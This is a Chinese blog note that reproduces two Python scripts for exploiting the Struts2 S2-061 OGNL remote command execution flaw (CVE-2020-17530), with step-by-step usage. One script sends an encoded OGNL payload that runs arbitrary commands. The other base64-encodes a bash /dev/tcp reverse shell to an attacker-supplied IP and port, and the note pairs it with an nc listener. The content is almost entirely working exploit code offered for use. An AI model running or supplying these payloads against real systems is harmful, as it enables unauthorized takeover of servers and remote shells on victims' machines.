【笔记】CVE-2020-17530漏洞利用

发表于 更新于 阅读次数:

前言

通过wuzuowei/CVE-2020-17530实现Java框架Struts2远程命令执行漏洞利用

下载项目

1
2
git clone https://github.com/wuzuowei/CVE-2020-17530.git
cd CVE-2020-17530

源代码

S2-061-shell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# encoding=utf-8
import requests
import sys
import base64
#import urllib.parse
import urllib

if len(sys.argv)!=2:
    print('+------------------------------------------------------------+')
    print('+      Use: python2 S2-061-shell.py http://1.1.1.1:8081      +')
    print('+                 VER: Struts 2.0.0-2.5.25                   +')
    print('+------------------------------------------------------------+')
    print('+                S2-061 RCE && CVE-2020-17530                +')
    print('+------------------------------------------------------------+')
    sys.exit()
# 填写监听ip及端口
ip = raw_input("Please input your listening ip:\n")
port = raw_input("Please input your listening port:\n")

# 对反弹shell命令进行编码
base_cmd = "bash -i >& /dev/tcp/"+str(ip)+"/"+str(port)+" 0>&1"
mid_cmd = base64.b64encode(base_cmd)
final_cmd = "{'bash -c {echo,"+mid_cmd+"}|{base64,-d}|{bash,-i}'}"
final_cmd=urllib.quote(final_cmd)

payload = "%25%7B%0A(%23request.map%3D%23application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0%2C0)%20%2B%20%0A(%23request.map.setBean(%23request.get('struts.valueStack'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.map2%3D%23application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0%2C0)%20%2B%0A(%23request.map2.setBean(%23request.get('map').get('context'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.map3%3D%23application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0%2C0)%20%2B%20%0A(%23request.map3.setBean(%23request.get('map2').get('memberAccess'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.get('map3').put('excludedPackageNames'%2C%23application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.get('map3').put('excludedClasses'%2C%23application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%0A(%23application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec("+final_cmd+"))%0A%7D"

def exp(url):
    tturl=url+"/?id="+payload
    print(tturl)
    requests.get(tturl)

if __name__=='__main__':
    url=str(sys.argv[1])
    exp(url)
struts2-061-poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# encoding=utf-8
import requests
import sys
from lxml import etree

# 环境是vulhub的S2-059环境修改的,针对这个环境访问 http://192.168.0.107:8080/?id=payload才行,不知道怎样才能通用
# 本脚本使用方法用例:python S2-061.py http://1.1.1.1:8081 whoami
# 好像适用vulhub更新的struts2-061环境

def exp(url,cmd):
    #payload需要经url编码,不能直接拼接在地址后
    payload="%25%7b(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application%5b%27org.apache.tomcat.InstanceManager%27%5d).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr%5b%27struts.valueStack%27%5d).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d%7b%27"+cmd+"%27%7d).(%23res%3d%23exec.exec(%23cmd))%7d"
    tturl=url+"/?id="+payload
    r=requests.get(tturl)
    page=r.text
#   etree=html.etree
    page=etree.HTML(page)
    data = page.xpath('//a[@id]/@id')
    print(data[0])

if __name__=='__main__':
    print('+------------------------------------------------------------+')
    print('+   PoC: python struts2-061-poc.py http://1.1.1.1:8081 id    +')
    print('+                VER: Struts 2.0.0-2.5.25                    +')
    print('+------------------------------------------------------------+')
    print('+               S2-061 RCE && CVE-2020-17530                 +')
    print('+------------------------------------------------------------+')
    if len(sys.argv)!=3:
        print("[+]ussage: http://ip:port command")
        print("[+]============================================================")
        sys.exit()
    url=sys.argv[1]
    cmd=sys.argv[2]
    exp(url,cmd)

poc

<shell>:远程执行的Shell命令

1
python2 struts2-061-poc.py <url> <shell>

exp

攻击者监听反弹Shell

1
nc -lvp <port_local>

受害者反弹Shell

<ip_local>:攻击者IP地址
<port_local>:攻击者端口号

1
python2 S2-061-shell.py <url>
1
2
3
4
Please input your listening ip:
<ip_local>
Please input your listening port:
<port_local>

完成